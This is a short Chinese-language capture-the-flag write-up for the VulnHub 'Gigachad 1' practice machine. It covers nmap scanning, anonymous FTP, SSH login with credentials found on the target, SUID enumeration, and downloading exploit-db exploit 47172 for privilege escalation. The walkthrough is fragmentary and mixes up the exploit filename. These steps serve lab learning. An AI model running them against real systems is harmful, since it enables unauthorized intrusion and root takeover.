前言
大家好,我是Leon-pi,可以叫我pipi,新人报道,是个菜鸟,由于个人也是在学习过程中,文章写的也不是面面俱到,尽善尽美,请见谅。
靶机介绍
靶机地址:http://www.vulnhub.com/entry/gigachad-1,657/
靶机难度:简单
靶机目标:get flag
开整
rw signie init=/bin/bash
vi /etc/network/interfaces
/etc/init.d/networking restart
这里看到已经分配到 IP 了,重启虚拟机,开搞!
nmap -sn -v -n -PE 192.168.154.0/24 --min-rate=2000
得到靶机ip:192.168.154.178 ,此时我们进行端口探测
nmap -sC -sV -p- -n -vv 192.168.154.178 --min-rate=2000
发现开放 21,22,80端口(ftp,ssh,http)
发现有 robots.txt文件,ftp允许匿名登录
VIRGIN【处女】
(意外发现跟首页一模一样有木有),添加到路径尝试访问一下,提示not found,改为小写继续访问额,还是他这个大脑袋~,没什么用,那就瞅瞅 robots文件吧...
我丢,这个憨憨竟然给军情处打电话了,MI5(英国军情5处),MI6(英国军情6处),难道暴露了!!!
得到 用户名为chad,看来密码就在那个图片中了,哎呀看到光明了,冲冲冲~
ssh chad@192.168.154.178
1、看系统发行版本 lsb_release -a
2、查看内核版本 uname -a
3、当前用户权限
4、列举suid文件(找到高权限执行的程序) find / -perm -u=s 2>/dev/null
5、查看已经安装的包、运行的服务,过期版本可能会存在漏洞
find / -perm -u=s -type f 2>/dev/null
.
1 exploit-db 下载 EXP
下载 EXP 命令:
wget https://www.exploit-db.com/download/47172
修改脚本去掉无用回车符号
sed -i "s/\r//" 447172
赋予 EXP 可执行权限
结语:
本人菜弟弟一个,大佬勿喷,谢谢